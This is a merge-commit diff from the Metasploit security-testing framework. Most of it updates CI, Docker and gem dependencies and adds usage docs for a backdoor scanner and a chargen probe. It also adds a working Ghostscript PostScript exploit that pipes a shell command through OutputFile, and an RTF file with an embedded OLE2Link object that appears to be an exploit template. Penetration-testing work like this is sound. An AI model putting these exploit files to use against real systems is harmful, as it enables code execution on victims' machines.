Merge branch 'master' into land-8293-multi-railgun
This commit is contained in:
commit
8422a7db39
|
@ -5,6 +5,10 @@ docker-compose*.yml
|
|||
docker/
|
||||
!docker/msfconsole.rc
|
||||
README.md
|
||||
.git/
|
||||
.github/
|
||||
.ruby-version
|
||||
.ruby-gemset
|
||||
|
||||
.bundle
|
||||
Gemfile.local
|
||||
|
@ -93,3 +97,6 @@ data/meterpreter/ext_server_pivot.*.dll
|
|||
# https://rapid7.github.io/metasploit-framework. It's an orphan branch.
|
||||
/metakitty
|
||||
.vagrant
|
||||
|
||||
# no need for rspecs
|
||||
spec/
|
||||
|
|
|
@ -88,3 +88,6 @@ data/meterpreter/ext_server_pivot.*.dll
|
|||
|
||||
# local docker compose overrides
|
||||
docker-compose.local*
|
||||
|
||||
# Ignore python bytecode
|
||||
*.pyc
|
||||
|
|
14
.travis.yml
14
.travis.yml
|
@ -16,12 +16,15 @@ rvm:
|
|||
- '2.4.1'
|
||||
|
||||
env:
|
||||
- RAKE_TASKS="cucumber cucumber:boot" CREATE_BINSTUBS=true
|
||||
- RAKE_TASKS=spec SPEC_OPTS="--tag content"
|
||||
- RAKE_TASKS=spec SPEC_OPTS="--tag ~content"
|
||||
- CMD=bundle exec rake "cucumber cucumber:boot" CREATE_BINSTUBS=true
|
||||
- CMD=bundle exec rake spec SPEC_OPTS="--tag content"
|
||||
- CMD=bundle exec rake spec SPEC_OPTS="--tag ~content"
|
||||
|
||||
matrix:
|
||||
fast_finish: true
|
||||
include:
|
||||
- rvm: ruby-head
|
||||
env: CMD="docker-compose -f $TRAVIS_BUILD_DIR/docker-compose.yml build"
|
||||
before_install:
|
||||
- "echo 'gem: --no-ri --no-rdoc' > ~/.gemrc"
|
||||
- rake --version
|
||||
|
@ -36,7 +39,7 @@ before_script:
|
|||
- bundle exec rake db:migrate
|
||||
script:
|
||||
# fail build if db/schema.rb update is not committed
|
||||
- git diff --exit-code db/schema.rb && bundle exec rake $RAKE_TASKS
|
||||
- git diff --exit-code db/schema.rb && $CMD
|
||||
|
||||
notifications:
|
||||
irc: "irc.freenode.org#msfnotify"
|
||||
|
@ -49,3 +52,6 @@ branches:
|
|||
except:
|
||||
- gh-pages
|
||||
- metakitty
|
||||
|
||||
services:
|
||||
- docker
|
||||
|
|
58
Gemfile.lock
58
Gemfile.lock
|
@ -1,13 +1,13 @@
|
|||
GIT
|
||||
remote: https://github.com/WinRb/rubyntlm
|
||||
revision: 7e2daf6076ba55a435d3e345498a7df40faa3d49
|
||||
revision: 38aaf1d59dd1a443e4a9c0aea2be232cfe262772
|
||||
branch: master
|
||||
specs:
|
||||
rubyntlm (0.6.1)
|
||||
rubyntlm (0.6.2)
|
||||
|
||||
GIT
|
||||
remote: https://github.com/banister/method_source
|
||||
revision: 6dcb116e37e20e58f615ffe05a40bbe9a536e44a
|
||||
revision: 0cc6cc8e15d08880585e8cb0c54e13c3cf937c54
|
||||
branch: master
|
||||
specs:
|
||||
method_source (0.8.1)
|
||||
|
@ -31,7 +31,7 @@ GIT
|
|||
PATH
|
||||
remote: .
|
||||
specs:
|
||||
metasploit-framework (4.14.15)
|
||||
metasploit-framework (4.14.17)
|
||||
actionpack (~> 4.2.6)
|
||||
activerecord (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
|
@ -44,9 +44,9 @@ PATH
|
|||
metasploit-concern
|
||||
metasploit-credential
|
||||
metasploit-model
|
||||
metasploit-payloads (= 1.2.24)
|
||||
metasploit-payloads (= 1.2.28)
|
||||
metasploit_data_models
|
||||
metasploit_payloads-mettle (= 0.1.8)
|
||||
metasploit_payloads-mettle (= 0.1.9)
|
||||
msgpack
|
||||
nessus_rest
|
||||
net-ssh
|
||||
|
@ -56,7 +56,7 @@ PATH
|
|||
octokit
|
||||
openssl-ccm
|
||||
openvas-omp
|
||||
packetfu (= 1.1.13.pre)
|
||||
packetfu
|
||||
patch_finder
|
||||
pcaprub
|
||||
pg
|
||||
|
@ -136,7 +136,7 @@ GEM
|
|||
bcrypt (3.1.11)
|
||||
bindata (2.4.0)
|
||||
builder (3.2.3)
|
||||
capybara (2.13.0)
|
||||
capybara (2.14.0)
|
||||
addressable
|
||||
mime-types (>= 1.16)
|
||||
nokogiri (>= 1.3.3)
|
||||
|
@ -146,7 +146,7 @@ GEM
|
|||
childprocess (0.5.9)
|
||||
ffi (~> 1.0, >= 1.0.11)
|
||||
coderay (1.1.1)
|
||||
contracts (0.15.0)
|
||||
contracts (0.16.0)
|
||||
cucumber (2.4.0)
|
||||
builder (>= 2.1.2)
|
||||
cucumber-core (~> 1.5.0)
|
||||
|
@ -177,7 +177,7 @@ GEM
|
|||
ffi (1.9.18)
|
||||
filesize (0.1.1)
|
||||
fivemat (1.3.3)
|
||||
gherkin (4.1.1)
|
||||
gherkin (4.1.3)
|
||||
google-protobuf (3.2.0.2)
|
||||
googleauth (0.5.1)
|
||||
faraday (~> 0.9)
|
||||
|
@ -222,7 +222,7 @@ GEM
|
|||
activemodel (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
railties (~> 4.2.6)
|
||||
metasploit-payloads (1.2.24)
|
||||
metasploit-payloads (1.2.28)
|
||||
metasploit_data_models (2.0.14)
|
||||
activerecord (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
|
@ -233,7 +233,7 @@ GEM
|
|||
postgres_ext
|
||||
railties (~> 4.2.6)
|
||||
recog (~> 2.0)
|
||||
metasploit_payloads-mettle (0.1.8)
|
||||
metasploit_payloads-mettle (0.1.9)
|
||||
mime-types (3.1)
|
||||
mime-types-data (~> 3.2015)
|
||||
mime-types-data (3.2016.0521)
|
||||
|
@ -254,7 +254,7 @@ GEM
|
|||
openssl-ccm (1.2.1)
|
||||
openvas-omp (0.0.4)
|
||||
os (0.9.6)
|
||||
packetfu (1.1.13.pre)
|
||||
packetfu (1.1.13)
|
||||
pcaprub
|
||||
patch_finder (1.0.2)
|
||||
pcaprub (0.12.4)
|
||||
|
@ -283,7 +283,7 @@ GEM
|
|||
thor (>= 0.18.1, < 2.0)
|
||||
rake (12.0.0)
|
||||
rb-readline (0.5.4)
|
||||
recog (2.1.5)
|
||||
recog (2.1.6)
|
||||
nokogiri
|
||||
redcarpet (3.4.0)
|
||||
rex-arch (0.1.4)
|
||||
|
@ -299,7 +299,7 @@ GEM
|
|||
metasm
|
||||
rex-arch
|
||||
rex-text
|
||||
rex-exploitation (0.1.12)
|
||||
rex-exploitation (0.1.13)
|
||||
jsobfu
|
||||
metasm
|
||||
rex-arch
|
||||
|
@ -312,7 +312,7 @@ GEM
|
|||
rex-arch
|
||||
rex-ole (0.1.5)
|
||||
rex-text
|
||||
rex-powershell (0.1.70)
|
||||
rex-powershell (0.1.71)
|
||||
rex-random_identifier
|
||||
rex-text
|
||||
rex-random_identifier (0.1.2)
|
||||
|
@ -333,23 +333,23 @@ GEM
|
|||
rex-text
|
||||
rkelly-remix (0.0.7)
|
||||
robots (0.10.1)
|
||||
rspec-core (3.5.4)
|
||||
rspec-support (~> 3.5.0)
|
||||
rspec-expectations (3.5.0)
|
||||
rspec-core (3.6.0)
|
||||
rspec-support (~> 3.6.0)
|
||||
rspec-expectations (3.6.0)
|
||||
diff-lcs (>= 1.2.0, < 2.0)
|
||||
rspec-support (~> 3.5.0)
|
||||
rspec-mocks (3.5.0)
|
||||
rspec-support (~> 3.6.0)
|
||||
rspec-mocks (3.6.0)
|
||||
diff-lcs (>= 1.2.0, < 2.0)
|
||||
rspec-support (~> 3.5.0)
|
||||
rspec-rails (3.5.2)
|
||||
rspec-support (~> 3.6.0)
|
||||
rspec-rails (3.6.0)
|
||||
actionpack (>= 3.0)
|
||||
activesupport (>= 3.0)
|
||||
railties (>= 3.0)
|
||||
rspec-core (~> 3.5.0)
|
||||
rspec-expectations (~> 3.5.0)
|
||||
rspec-mocks (~> 3.5.0)
|
||||
rspec-support (~> 3.5.0)
|
||||
rspec-support (3.5.0)
|
||||
rspec-core (~> 3.6.0)
|
||||
rspec-expectations (~> 3.6.0)
|
||||
rspec-mocks (~> 3.6.0)
|
||||
rspec-support (~> 3.6.0)
|
||||
rspec-support (3.6.0)
|
||||
ruby_smb (0.0.12)
|
||||
bindata
|
||||
rubyntlm
|
||||
|
@ -383,7 +383,7 @@ GEM
|
|||
xmlrpc (0.3.0)
|
||||
xpath (2.0.0)
|
||||
nokogiri (~> 1.3)
|
||||
yard (0.9.8)
|
||||
yard (0.9.9)
|
||||
|
||||
PLATFORMS
|
||||
ruby
|
||||
|
|
48
LICENSE_GEMS
48
LICENSE_GEMS
|
@ -1,3 +1,4 @@
|
|||
This file is auto-generated by tools/dev/update_gem_licenses.sh
|
||||
actionpack, 4.2.8, MIT
|
||||
actionview, 4.2.8, MIT
|
||||
activemodel, 4.2.8, MIT
|
||||
|
@ -8,14 +9,14 @@ arel, 6.0.4, MIT
|
|||
arel-helpers, 2.3.0, unknown
|
||||
aruba, 0.14.2, MIT
|
||||
bcrypt, 3.1.11, MIT
|
||||
bindata, 2.3.5, ruby
|
||||
bindata, 2.4.0, ruby
|
||||
bit-struct, 0.15.0, ruby
|
||||
builder, 3.2.3, MIT
|
||||
bundler, 1.14.6, MIT
|
||||
capybara, 2.13.0, MIT
|
||||
capybara, 2.14.0, MIT
|
||||
childprocess, 0.5.9, MIT
|
||||
coderay, 1.1.1, MIT
|
||||
contracts, 0.15.0, "Simplified BSD"
|
||||
contracts, 0.16.0, "Simplified BSD"
|
||||
cucumber, 2.4.0, MIT
|
||||
cucumber-core, 1.5.0, MIT
|
||||
cucumber-rails, 1.4.5, MIT
|
||||
|
@ -25,31 +26,31 @@ docile, 1.1.5, MIT
|
|||
erubis, 2.7.0, MIT
|
||||
factory_girl, 4.8.0, MIT
|
||||
factory_girl_rails, 4.8.0, MIT
|
||||
faraday, 0.12.0.1, MIT
|
||||
faraday, 0.12.1, MIT
|
||||
ffi, 1.9.18, "New BSD"
|
||||
filesize, 0.1.1, MIT
|
||||
fivemat, 1.3.3, MIT
|
||||
gherkin, 4.1.1, MIT
|
||||
gherkin, 4.1.3, MIT
|
||||
google-protobuf, 3.2.0.2, "New BSD"
|
||||
googleauth, 0.5.1, "Apache 2.0"
|
||||
grpc, 1.2.2, "New BSD"
|
||||
grpc, 1.2.5, "New BSD"
|
||||
i18n, 0.8.1, MIT
|
||||
jsobfu, 0.4.2, "New BSD"
|
||||
json, 2.0.3, ruby
|
||||
json, 2.1.0, ruby
|
||||
jwt, 1.5.6, MIT
|
||||
little-plugger, 1.1.4, MIT
|
||||
logging, 2.2.0, MIT
|
||||
logging, 2.2.2, MIT
|
||||
loofah, 2.0.3, MIT
|
||||
memoist, 0.15.0, MIT
|
||||
metasm, 1.0.3, LGPL
|
||||
metasploit-aggregator, 0.1.3, "New BSD"
|
||||
metasploit-concern, 2.0.3, "New BSD"
|
||||
metasploit-credential, 2.0.8, "New BSD"
|
||||
metasploit-framework, 4.14.9, "New BSD"
|
||||
metasploit-framework, 4.14.17, "New BSD"
|
||||
metasploit-model, 2.0.3, "New BSD"
|
||||
metasploit-payloads, 1.2.19, "3-clause (or ""modified"") BSD"
|
||||
metasploit-payloads, 1.2.28, "3-clause (or ""modified"") BSD"
|
||||
metasploit_data_models, 2.0.14, "New BSD"
|
||||
metasploit_payloads-mettle, 0.1.8, "3-clause (or ""modified"") BSD"
|
||||
metasploit_payloads-mettle, 0.1.9, "3-clause (or ""modified"") BSD"
|
||||
method_source, 0.8.1, MIT
|
||||
mime-types, 3.1, MIT
|
||||
mime-types-data, 3.2016.0521, MIT
|
||||
|
@ -68,7 +69,7 @@ octokit, 4.7.0, MIT
|
|||
openssl-ccm, 1.2.1, MIT
|
||||
openvas-omp, 0.0.4, MIT
|
||||
os, 0.9.6, MIT
|
||||
packetfu, 1.1.13.pre, BSD
|
||||
packetfu, 1.1.13, BSD
|
||||
patch_finder, 1.0.2, "New BSD"
|
||||
pcaprub, 0.12.4, LGPL-2.1
|
||||
pg, 0.20.0, "New BSD"
|
||||
|
@ -84,18 +85,18 @@ rails-html-sanitizer, 1.0.3, MIT
|
|||
railties, 4.2.8, MIT
|
||||
rake, 12.0.0, MIT
|
||||
rb-readline, 0.5.4, BSD
|
||||
recog, 2.1.5, unknown
|
||||
recog, 2.1.6, unknown
|
||||
redcarpet, 3.4.0, MIT
|
||||
rex-arch, 0.1.4, "New BSD"
|
||||
rex-bin_tools, 0.1.2, "New BSD"
|
||||
rex-core, 0.1.9, "New BSD"
|
||||
rex-encoder, 0.1.3, "New BSD"
|
||||
rex-exploitation, 0.1.12, "New BSD"
|
||||
rex-exploitation, 0.1.13, "New BSD"
|
||||
rex-java, 0.1.4, "New BSD"
|
||||
rex-mime, 0.1.4, "New BSD"
|
||||
rex-nop, 0.1.0, unknown
|
||||
rex-ole, 0.1.5, "New BSD"
|
||||
rex-powershell, 0.1.70, "New BSD"
|
||||
rex-powershell, 0.1.71, "New BSD"
|
||||
rex-random_identifier, 0.1.2, "New BSD"
|
||||
rex-registry, 0.1.2, "New BSD"
|
||||
rex-rop_builder, 0.1.2, "New BSD"
|
||||
|
@ -106,13 +107,13 @@ rex-text, 0.2.14, "New BSD"
|
|||
rex-zip, 0.1.2, "New BSD"
|
||||
rkelly-remix, 0.0.7, MIT
|
||||
robots, 0.10.1, MIT
|
||||
rspec-core, 3.5.4, MIT
|
||||
rspec-expectations, 3.5.0, MIT
|
||||
rspec-mocks, 3.5.0, MIT
|
||||
rspec-rails, 3.5.2, MIT
|
||||
rspec-support, 3.5.0, MIT
|
||||
ruby_smb, 0.0.8, "New BSD"
|
||||
rubyntlm, 0.6.1, MIT
|
||||
rspec-core, 3.6.0, MIT
|
||||
rspec-expectations, 3.6.0, MIT
|
||||
rspec-mocks, 3.6.0, MIT
|
||||
rspec-rails, 3.6.0, MIT
|
||||
rspec-support, 3.6.0, MIT
|
||||
ruby_smb, 0.0.12, "New BSD"
|
||||
rubyntlm, 0.6.2, MIT
|
||||
rubyzip, 1.2.1, "Simplified BSD"
|
||||
sawyer, 0.8.1, MIT
|
||||
shoulda-matchers, 3.1.1, MIT
|
||||
|
@ -127,5 +128,6 @@ timecop, 0.8.1, MIT
|
|||
tzinfo, 1.2.3, MIT
|
||||
tzinfo-data, 1.2017.2, MIT
|
||||
windows_error, 0.1.1, BSD
|
||||
xmlrpc, 0.3.0, ruby
|
||||
xpath, 2.0.0, unknown
|
||||
yard, 0.9.8, MIT
|
||||
yard, 0.9.9, MIT
|
||||
|
|
|
@ -0,0 +1,101 @@
|
|||
%!PS-Adobe-3.0 EPSF-3.0
|
||||
%%BoundingBox: -0 -0 100 100
|
||||
|
||||
|
||||
/size_from 10000 def
|
||||
/size_step 500 def
|
||||
/size_to 65000 def
|
||||
/enlarge 1000 def
|
||||
|
||||
%/bigarr 65000 array def
|
||||
|
||||
0
|
||||
size_from size_step size_to {
|
||||
pop
|
||||
1 add
|
||||
} for
|
||||
|
||||
/buffercount exch def
|
||||
|
||||
/buffersizes buffercount array def
|
||||
|
||||
|
||||
0
|
||||
size_from size_step size_to {
|
||||
buffersizes exch 2 index exch put
|
||||
1 add
|
||||
} for
|
||||
pop
|
||||
|
||||
/buffers buffercount array def
|
||||
|
||||
0 1 buffercount 1 sub {
|
||||
/ind exch def
|
||||
buffersizes ind get /cursize exch def
|
||||
cursize string /curbuf exch def
|
||||
buffers ind curbuf put
|
||||
cursize 16 sub 1 cursize 1 sub {
|
||||
curbuf exch 255 put
|
||||
} for
|
||||
} for
|
||||
|
||||
|
||||
/buffersearchvars [0 0 0 0 0] def
|
||||
/sdevice [0] def
|
||||
|
||||
enlarge array aload
|
||||
|
||||
{
|
||||
.eqproc
|
||||
buffersearchvars 0 buffersearchvars 0 get 1 add put
|
||||
buffersearchvars 1 0 put
|
||||
buffersearchvars 2 0 put
|
||||
buffercount {
|
||||
buffers buffersearchvars 1 get get
|
||||
buffersizes buffersearchvars 1 get get
|
||||
16 sub get
|
||||
254 le {
|
||||
buffersearchvars 2 1 put
|
||||
buffersearchvars 3 buffers buffersearchvars 1 get get put
|
||||
buffersearchvars 4 buffersizes buffersearchvars 1 get get 16 sub put
|
||||
} if
|
||||
buffersearchvars 1 buffersearchvars 1 get 1 add put
|
||||
} repeat
|
||||
|
||||
buffersearchvars 2 get 1 ge {
|
||||
exit
|
||||
} if
|
||||
%(.) print
|
||||
} loop
|
||||
|
||||
.eqproc
|
||||
.eqproc
|
||||
.eqproc
|
||||
sdevice 0
|
||||
currentdevice
|
||||
buffersearchvars 3 get buffersearchvars 4 get 16#7e put
|
||||
buffersearchvars 3 get buffersearchvars 4 get 1 add 16#12 put
|
||||
buffersearchvars 3 get buffersearchvars 4 get 5 add 16#ff put
|
||||
put
|
||||
|
||||
|
||||
buffersearchvars 0 get array aload
|
||||
|
||||
sdevice 0 get
|
||||
16#3e8 0 put
|
||||
|
||||
sdevice 0 get
|
||||
16#3b0 0 put
|
||||
|
||||
sdevice 0 get
|
||||
16#3f0 0 put
|
||||
|
||||
|
||||
currentdevice null false mark /OutputFile (%pipe%echo vulnerable > /dev/tty)
|
||||
.putdeviceparams
|
||||
1 true .outputpage
|
||||
.rsdparams
|
||||
%{ } loop
|
||||
0 0 .quit
|
||||
%asdf
|
||||
|
|
@ -0,0 +1,33 @@
|
|||
{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe2052\themelang1033\themelangfe2052\themelangcs0
|
||||
{\info
|
||||
{\author Microsoft}
|
||||
{\operator Microsoft}
|
||||
}
|
||||
{\*\xmlnstbl {\xmlns1 http://schemas.microsoft.com/office/word/2003/wordml}}
|
||||
{
|
||||
{\object\objautlink\objupdate\rsltpict\objw291\objh230\objscalex99\objscaley101
|
||||
{\*\objclass Word.Document.8}
|
||||
{\*\objdata 0105000002000000
|
||||
090000004f4c45324c696e6b000000000000000000000a0000
|
||||
d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||
fffffffffffffffffdfffffffefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||
ffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000003000000000000c000000000000046000000000000000000000000704d
|
||||
6ca637b5d20103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000
|
||||
000000000000000000000000f00000000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000
|
||||
0000000000000000000004000000060000000000000003004c0069006e006b0049006e0066006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff000000000000000000000000000000000000000000000000
|
||||
00000000000000000000000005000000b700000000000000010000000200000003000000fefffffffeffffff0600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||
MINISTREAM_DATA
|
||||
0105000000000000}
|
||||
{\result {\rtlch\fcs1 \af31507 \ltrch\fcs0 \insrsid1979324 }}}}
|
||||
{\*\datastore }
|
||||
}
|
|
@ -1,6 +1,6 @@
|
|||
version: '2'
|
||||
services:
|
||||
ms: &ms
|
||||
ms:
|
||||
image: metasploit
|
||||
build:
|
||||
context: .
|
||||
|
@ -12,7 +12,7 @@ services:
|
|||
ports:
|
||||
- 4444:4444
|
||||
volumes:
|
||||
- $HOME/.msf4:/root/.msf4
|
||||
- $HOME/.msf4:/home/msf/.msf4
|
||||
|
||||
db:
|
||||
image: postgres:9.6
|
||||
|
|
|
@ -1,8 +1,9 @@
|
|||
FROM ruby:2.3-alpine
|
||||
MAINTAINER Rapid7
|
||||
|
||||
ARG BUNDLER_ARGS="--system --jobs=8"
|
||||
ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
|
||||
ENV APP_HOME /usr/src/metasploit-framework/
|
||||
ENV MSF_USER msf
|
||||
WORKDIR $APP_HOME
|
||||
|
||||
COPY Gemfile* m* Rakefile $APP_HOME
|
||||
|
@ -10,19 +11,16 @@ COPY lib $APP_HOME/lib
|
|||
|
||||
RUN apk update && \
|
||||
apk add \
|
||||
ruby-bigdecimal \
|
||||
ruby-bundler \
|
||||
ruby-io-console \
|
||||
sqlite-libs \
|
||||
nmap \
|
||||
postgresql-libs \
|
||||
# needed as long as metasploit-framework.gemspec contains a 'git ls'
|
||||
git \
|
||||
ncurses \
|
||||
libcap \
|
||||
&& apk add --virtual .ruby-builddeps \
|
||||
autoconf \
|
||||
bison \
|
||||
subversion \
|
||||
git \
|
||||
sqlite \
|
||||
nmap \
|
||||
libxslt \
|
||||
postgresql \
|
||||
ncurses \
|
||||
&& apk add --virtual .ruby-builddeps \
|
||||
build-base \
|
||||
ruby-dev \
|
||||
libffi-dev\
|
||||
|
@ -36,12 +34,21 @@ RUN apk update && \
|
|||
yaml-dev \
|
||||
zlib-dev \
|
||||
ncurses-dev \
|
||||
bison \
|
||||
autoconf \
|
||||
&& echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
|
||||
&& bundle install $BUNDLER_ARGS \
|
||||
&& bundle install --system $BUNDLER_ARGS \
|
||||
&& apk del .ruby-builddeps \
|
||||
&& rm -rf /var/cache/apk/*
|
||||
|
||||
# fix for robots gem not readable (known bug)
|
||||
# https://github.com/rapid7/metasploit-framework/issues/6068
|
||||
RUN chmod o+r /usr/local/bundle/gems/robots-*/lib/robots.rb
|
||||
|
||||
RUN adduser -g msfconsole -D $MSF_USER
|
||||
|
||||
RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
|
||||
|
||||
USER $MSF_USER
|
||||
|
||||
ADD ./ $APP_HOME
|
||||
|
||||
CMD ["./msfconsole", "-r", "docker/msfconsole.rc"]
|
||||
|
|
|
@ -1,7 +1,11 @@
|
|||
version: '2'
|
||||
|
||||
services:
|
||||
ms: &ms
|
||||
ms:
|
||||
build:
|
||||
args:
|
||||
BUNDLER_ARGS: --jobs=8
|
||||
image: metasploit:dev
|
||||
environment:
|
||||
DATABASE_URL: postgres://postgres@db:5432/msf_dev
|
||||
|
||||
|
|
|
@ -1,5 +1,10 @@
|
|||
<ruby>
|
||||
run_single("setg LHOST #{ENV['LHOST']}") if ENV['LHOST']
|
||||
run_single("setg LPORT #{ENV['LPORT']}") if ENV['LPORT']
|
||||
if ENV['LHOST']
|
||||
lhost = ENV['LHOST']
|
||||
else
|
||||
lhost = %x(hostname -i)
|
||||
end
|
||||
run_single("setg LHOST #{lhost}")
|
||||
run_single("db_connect #{ENV['DATABASE_URL'].gsub('postrgres://', '')}") if ENV['DATABASE_URL']
|
||||
</ruby>
|
||||
|
|
|
@ -0,0 +1,27 @@
|
|||
## Vulnerable Application
|
||||
|
||||
More information can be found on the [Rapid7 Blog](https://community.rapid7.com/community/metasploit/blog/2010/03/08/locate-and-exploit-the-energizer-trojan).
|
||||
Energizer's "DUO" USB Battery Charger included a backdoor which listens on port 7777.
|
||||
|
||||
The software can be downloaded from the [Wayback Machine](http://web.archive.org/web/20080722134654/www.energizer.com/usbcharger/language/english/download.aspx).
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install the vulnerable software
|
||||
2. Start msfconsole
|
||||
3. Do: `use auxiliary/scanner/backdoor/energizer_duo_detect`
|
||||
4. Do: `set rhosts`
|
||||
5. Do: `run`
|
||||
|
||||
## Scenarios
|
||||
|
||||
A run against the backdoor
|
||||
|
||||
```
|
||||
msf > use auxiliary/scanner/backdoor/energizer_duo_detect
|
||||
msf auxiliary(energizer_duo_detect) > set RHOSTS 192.168.0.0/24
|
||||
msf auxiliary(energizer_duo_detect) > set THREADS 256
|
||||
msf auxiliary(energizer_duo_detect) > run
|
||||
|
||||
[*] 192.168.0.132:7777 FOUND: [["F", "AUTOEXEC.BAT"]...
|
||||
```
|
|
@ -0,0 +1,50 @@
|
|||
## Vulnerable Application
|
||||
|
||||
Chargen is a debugging and measurement tool and a character generator service. Often `chargen` is included in `xinetd`,
|
||||
along with `echo`, `time`, `daytime`, and `discard`.
|
||||
While its possible to run chargen on TCP, the most common implementation is UDP.
|
||||
|
||||
The following was done on Kali linux:
|
||||
|
||||
1. `apt-get install xinetd`
|
||||
2. edit `/etc/xinetd.d/chargen` and changed `disabled = yes` to `disabled = no`. The first one is for `TCP` and the second is for `UDP`.
|
||||
3. Restart the service: `service xinetd restart`
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install and configure chargen
|
||||
2. Start msfconsole
|
||||
3. Do: `use auxiliary/scanner/chargen/chargen_probe`
|
||||
4. Do: `run`
|
||||
|
||||
## Scenarios
|
||||
|
||||
A run against the configuration from these docs
|
||||
|
||||
```
|
||||
msf > use auxiliary/scanner/chargen/chargen_probe
|
||||
msf auxiliary(chargen_probe) > set rhosts 127.0.0.1
|
||||
rhosts => 127.0.0.1
|
||||
msf auxiliary(chargen_probe) > set verbose true
|
||||
verbose => true
|
||||
msf auxiliary(chargen_probe) > run
|
||||
|
||||
[*] 127.0.0.1:19 - Response: !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefgh
|
||||
"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghi
|
||||
#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghij
|
||||
$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijk
|
||||
%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijkl
|
||||
&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklm
|
||||
'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmn
|
||||
()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmno
|
||||
)*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnop
|
||||
*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopq
|
||||
+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqr
|
||||
,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrs
|
||||
